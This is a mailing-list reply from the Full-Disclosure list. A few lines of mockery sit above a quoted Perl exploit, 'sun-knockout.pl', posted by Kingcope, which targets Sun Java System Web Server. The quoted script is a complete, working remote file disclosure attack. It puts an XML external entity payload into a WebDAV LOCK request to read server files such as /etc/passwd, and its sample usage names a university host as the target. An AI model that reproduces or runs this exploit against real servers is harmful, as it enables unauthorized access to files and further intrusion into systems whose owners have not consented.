Re: Sun D3VS SM0KiNG PoT AGAiN

[Christian Sciberras <uuf6429 () gmail com>]

"Sun D3VS SM0KiNG PoT AGAiN"
"SuPP0RT iF YOU#RE kRAD KTHX"

What the fuck is wrong with you guys?
Ever gave the psychiatrist a visit?






On Sat, Apr 3, 2010 at 3:14 PM, Kingcope <kcope2 () googlemail com> wrote:

> sun-knockout.pl EXPLOiT CORRECTED, ADD AUTHEN+SSL SuPP0RT iF YOU#RE kRAD
> KTHX
>
> #!/usr/bin/perl
> # aNOTH3R TiP OF THE iCE-BERG ReMOTE eXPLoiT
> # oO SUN MiCROSYSTEMZ - SUN JAVA SYSTEM WEB SERVER Oo
> # oO REMOTE FiLE DiSCLOSURE EXPLOIT Oo
> # oO BUG FOUND & EXPLOiTED BY KiNGCOPE // ISOWAREZ.DE Oo
> # !! THIS EXPLOIT IS NOW PRIVATE ON FULL DISCLOSURE !!
> # MAY/2010
> # VERY THANKS TO LSD
> #
> #
> # oO VERiFIED oN Oo
> #
> # SUN JAVA SYSTEM WEB SERVER 7.0U4 B12/02/2008 [PLatFoRMz: WiNDOWS
> SERVER 2008 & SunOS 5.10]
> # SHOULD GiVE YOU READABLE FiLES BY UID WEBSERVD
> # [SunONE/iPLANET MAY ALSO BE EXPLOiTABLE]
> # RoCKiNG tHA SuRFACE SiNCE 2003 kTHX
>
> use IO::Socket;
> use MIME::Base64;
>
> print "//Sun Microsystems Sun Java System Web Server\n";
> print "//Remote File Disclosure Exploit\n";
> print "//by Kingcope\n";
> print "May/2010\n";
>
> if ($#ARGV != 2) {
>         print "usage: perl sunone.pl <target> <webdav directory> <file to
> get>\n";
>        print "sample: perl sunone.pl lib7.berkeley.edu /dav
> /etc/passwd\n";
>         exit;
> }
>
> $target = $ARGV[0];
>
> $|=1;
>
> $remotefile = $ARGV[2];
> $folder = $ARGV[1];
>
> $KRADXmL =
> "<?xml version=\"1.0\"?>\n"
> ."<!DOCTYPE REMOTE [\n"
> ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n"
> ."]>\n"
> ."<D:lockinfo xmlns:D='DAV:'>\n"
> ."<D:lockscope><D:exclusive/></D:lockscope>\n"
> ."<D:locktype><D:write/></D:locktype>\n"
> ."<D:owner>\n"
> ."<D:href>\n"
> ."<REMOTE>\n"
> ."<RemoteX>&RemoteX;</RemoteX>\n"
> ."</REMOTE>\n"
> ."</D:href>\n"
> ."</D:owner>\n"
> ."</D:lockinfo>\n";
>
> $sock = IO::Socket::INET->new(PeerAddr => $target,
>                               PeerPort => '80',
>                              Proto    => 'tcp');
>
> print $sock "LOCK /$folder HTTP/1.1\r\n".
>                        "Host: $target\r\n".
>                        "Depth: 0\r\n".
>                        "Connection: close\r\n".
>                        "Content-Type: application/xml\r\nContent-Length:
> ".length($KRADXmL)."\r\n\r\n".
>                        $KRADXmL;
>
> $locktoken = "";
> while(<$sock>) {
>        if ($_ =~ /^Lock-token:\s(.*)?\r/) {
>                $locktoken = $1;
>                chomp $locktoken;
>        }
>        print;
> }
>
> close($sock);
>
> $sock = IO::Socket::INET->new(PeerAddr => $target,
>                               PeerPort => '80',
>                               Proto    => 'tcp');
>
> print $sock "UNLOCK /$folder HTTP/1.1\r\n".
>                        "Host: $target\r\n".
>                        "Connection: close\r\n".
>                        "Lock-token: $locktoken\r\n\r\n";
>
> while(<$sock>) {
>        print;
> }
> close($sock);
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/